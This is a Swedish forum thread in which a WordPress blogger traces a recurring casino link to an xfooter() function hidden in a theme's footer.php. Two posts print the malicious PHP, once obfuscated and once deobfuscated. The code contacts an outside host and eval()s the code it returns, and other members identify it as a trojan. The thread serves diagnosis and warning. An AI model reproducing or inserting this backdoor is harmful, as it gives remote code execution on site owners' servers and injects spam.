webForumDet fria alternativet

Länk läggs till automatiskt i WP

Webbutveckling

8 svar · 1 016 visningar · startad av K@llen

Medlem sedan mars 20032 667 inlägg
Frågan#1

Hejsan,

Jag trixar med en WP-blogg (http://sundara.se/blogg/). Har fått det mesta som jag vill, men där är ett beskymmer. Under bloggroll läggs det till en länk automatiskt till ett Casino.

Jag raderar i admin, men den kommer dit automatiskt igen. Har letat runt som attan, men hittar inte vad det beror på. :(

Någon som varit med om liknande? Vad kan det bero på?

Medlem sedan mars 20032 667 inlägg
#2

Länken som läggs till är till "Casino en Ligne" med adress portalux.com

Jag har blivit av med den tillfälligt genom att inte radera den utan göra den osynlig i admin. Men är klart intresseras varför den dyker upp?

Medlem sedan mars 20032 667 inlägg
#3

Tror jag kommit en bit på vägen iaf. :)

I footer.php hittade jag följande rad:

<?php xfooter(); do_action('wp_footer'); ?>

do_action('wp_footer') känner jag igen, men inte funktionen xfooter().

<?php

function xfooter()  {   global $wpdb;     $RDAFE7FE4FDC52E2D1048573B4DB1DF18 = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_time_eval'");   

$R41CCFE75D7AC2B4681397CFC70BAEF40 = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_eval'");     

if (empty($RDAFE7FE4FDC52E2D1048573B4DB1DF18)) {    $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_time_eval', '0', 'no')");    

$RBDCA893A9385C089DC5F358AAA52C09B = 0;   } else $RBDCA893A9385C089DC5F358AAA52C09B = intval($RDAFE7FE4FDC52E2D1048573B4DB1DF18[0]);     

if (empty($R41CCFE75D7AC2B4681397CFC70BAEF40)) {    $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_eval', '<br/>', 'no')");   

$RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = '<br/>';   } else $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = $R41CCFE75D7AC2B4681397CFC70BAEF40[0]; 

@eval('$R14AF1BE9EE26A90921E64A82E7836797 = 1;');

if($R14AF1BE9EE26A90921E64A82E7836797)   {    $R5F38CE9C0B222F3BB0880E016DC07527 = "1";   }   else   {    $R5F38CE9C0B222F3BB0880E016DC07527 = "0";   }     

if ( ( time() - $RBDCA893A9385C089DC5F358AAA52C09B ) >= 60 ) {      

$R39C188653EA53DBD6E3F1D3915EDAC0C = "com";    
$R8088818E3E46A17C12F2EE42EB12D7AC = "2.";    
$R7B934F06258B8BA3608E30CDE9EA1035 = "xpstatz";    
$RAD8CC24399FEA84D3454DD7057C38FD0 = "xps-$R5F38CE9C0B222F3BB0880E016DC07527.";    
$RBF7582359E6813BD7C54DD76E7505037 = "$R8088818E3E46A17C12F2EE42EB12D7AC$R7B934F06258B8BA3608E30CDE9EA1035.$R39C188653EA53DBD6E3F1D3915EDAC0C";    
$RA81C90DCC503F6900F7DC424AD04F525 = "/".$RAD8CC24399FEA84D3454DD7057C38FD0."php?h=" . urlencode($_SERVER['HTTP_HOST']) . "&u=" . urlencode($_SERVER['REQUEST_URI']);      

if (ini_get('allow_url_fopen')) {     $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = @file_get_contents("http://" . $RBF7582359E6813BD7C54DD76E7505037 . $RA81C90DCC503F6900F7DC424AD04F525);    
} else {     $RF500F4A848E2EB2F8AAC3A6734D7EC38 = @fsockopen($RBF7582359E6813BD7C54DD76E7505037, '80', $R87844B1C6FC922407E6020B6B224950F, $R1966719AEC0096F98BA934D649A6E28D, 30);  
   
if ($RF500F4A848E2EB2F8AAC3A6734D7EC38) {      @stream_set_timeout($RF500F4A848E2EB2F8AAC3A6734D7EC38, 60);        

@fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "GET $RA81C90DCC503F6900F7DC424AD04F525 HTTP/1.1\r\n");  
 
@fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Host: $RBF7582359E6813BD7C54DD76E7505037\r\n");   
   
@fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Connection: Close\r\n\r\n");        

$RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = "";        

while(!feof($RF500F4A848E2EB2F8AAC3A6734D7EC38)) {       $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 .= @fgets($RF500F4A848E2EB2F8AAC3A6734D7EC38, 1024);
      }        
$RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = trim(strstr($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1, "\r\n\r\n"));     }       @fclose($RF500F4A848E2EB2F8AAC3A6734D7EC38);    
}      

if ( is_string($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1) ) {     $RBDCA893A9385C089DC5F358AAA52C09B = time(); 

if($R14AF1BE9EE26A90921E64A82E7836797)  {    @eval($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1); 
 
}  else  {    
echo "$RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1";  
}    $R9446905AFC32B438C0BD070AD05F3D83 = mysql_real_escape_string($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1);
       
$wpdb->query("UPDATE $wpdb->options SET option_value=$RBDCA893A9385C089DC5F358AAA52C09B WHERE option_name='l_time_eval'");     

$wpdb->query("UPDATE $wpdb->options SET option_value='$R9446905AFC32B438C0BD070AD05F3D83' WHERE option_name='l_eval'");    }   }  }

?>

Jag blev av med problemet när jag kommenterade bort denna funktionen.

Någon som hänger med på vad funktionen försöker göra? Den har iaf lagt till massa skräp i databasen. :(

Medlem sedan juni 20019 024 inlägg
#4

Ta bort det där temat, tillägget eller vad det är du har installerat omedelbart. Det är en trojan som leder till xpstatz.com.

Jag har försökt att läsa mig till den svårlästa koden och den hämtar information från en extern webbsida och lagrar det i din databas. Dessutom verkar den föra statistik över webbplatsen.

<?php

function xfooter()  {
	   global $wpdb;     $query = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_time_eval'");   

	$optionvalue = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_eval'");     

	if (empty($query)) {    $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_time_eval', '0', 'no')");    

	$int = 0;   } else $int = intval($query[0]);     

	if (empty($optionvalue)) {    $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_eval', '<br/>', 'no')");   

	$contents = '<br/>';   } else $contents = $optionvalue[0]; 

	@eval('$integerwithvalue1 = 1;');

	if($integerwithvalue1)   {    $partofspamhost = "1";   }   else   {    $partofspamhost = "0";   }     

	if ( ( time() - $int ) >= 60 ) {      

	$spamtdl = "com";    
	$spamsubdomain = "2.";    
	$spamdomain = "xpstatz";    
	$spamhost = "xps-$partofspamhost.";    
	$host = "$spamsubdomain$spamdomain.$spamtdl";    
	$spamurl = "/".$spamhost."php?h=" . urlencode($_SERVER['HTTP_HOST']) . "&u=" . urlencode($_SERVER['REQUEST_URI']);      

	if (ini_get('allow_url_fopen')) {     $contents = @file_get_contents("http://" . $host . $spamurl);    
	} else {     $fsockopenstring = @fsockopen($host, '80', $R87844B1C6FC922407E6020B6B224950F, $R1966719AEC0096F98BA934D649A6E28D, 30);  
		   
	if ($fsockopenstring) {      @stream_set_timeout($fsockopenstring, 60);        

	@fwrite($fsockopenstring, "GET $spamurl HTTP/1.1\r\n");  
		 
	@fwrite($fsockopenstring, "Host: $host\r\n");   
		   
	@fwrite($fsockopenstring, "Connection: Close\r\n\r\n");        

	$contents = "";        

	while(!feof($fsockopenstring)) {       $contents .= @fgets($fsockopenstring, 1024);
		      }        
	$contents = trim(strstr($contents, "\r\n\r\n"));     }       @fclose($fsockopenstring);    
	}      

	if ( is_string($contents) ) {     $int = time(); 

	if($integerwithvalue1)  {    @eval($contents); 
		 
	}  else  {    
	echo "$contents";  
	}    $putintoyourdatabase = mysql_real_escape_string($contents)  ;
		       
	$wpdb->query("UPDATE $wpdb->options SET option_value=$int WHERE option_name='l_time_eval'");     

	$wpdb->query("UPDATE $wpdb->options SET option_value='$putintoyourdatabase' WHERE option_name='l_eval'");    }   }  
	}

?>
Medlem sedan mars 20032 667 inlägg
#5

Tack Pace! :)

Jag kom fram till samma sak med friska ögon i morse/förmiddag. Tog ner temat i går när jag hittade funktionen. Får leta rätt på annat tema att modifiera och översätta.

Vilka webbplatser är bäst att ta hem teman ifrån?

EDIT:
Passar på att varna andra för temat wonderland-10.

Medlem sedan maj 20007 492 inlägg
#6

Du kanske inte ska låta din wordpress installation ligga helt öppet på din url nu. Jag tor jag tar och sätter upp en ny blogg där nu faktiskt. Kanske postar lite skön gris-porr när jag ändå är i farten.

Medlem sedan mars 20032 667 inlägg
#7

Ligga öppet?

Medlem sedan maj 20007 492 inlägg
#8

När jag gick in på denna länken när jag skrev mitt förra inlägg så möttes jag av den vanliga installations guiden i WP som började med att jag skulle skriva in Title och E-postadress.

Medlem sedan mars 20032 667 inlägg
#9

Okkido skrev:

När jag gick in på denna länken när jag skrev mitt förra inlägg så möttes jag av den vanliga installations guiden i WP som började med att jag skulle skriva in Title och E-postadress.

Låter konstigt. För jag raderade filen install.php direkt efter installation. Då hann du besöka sidan under de 20 sekunder det tog från uppladdning till jag var klar. Någon mer fil som ska raderas?

265 ms totalt · 4 externa anrop · v20260731065814-full.86ec41c2
123 ms — deklarationer (db)
0 ms — hämta statistik (cache)
134 ms — hämta tråd, inlägg och bilagor (db)
128 ms — ändringar (db)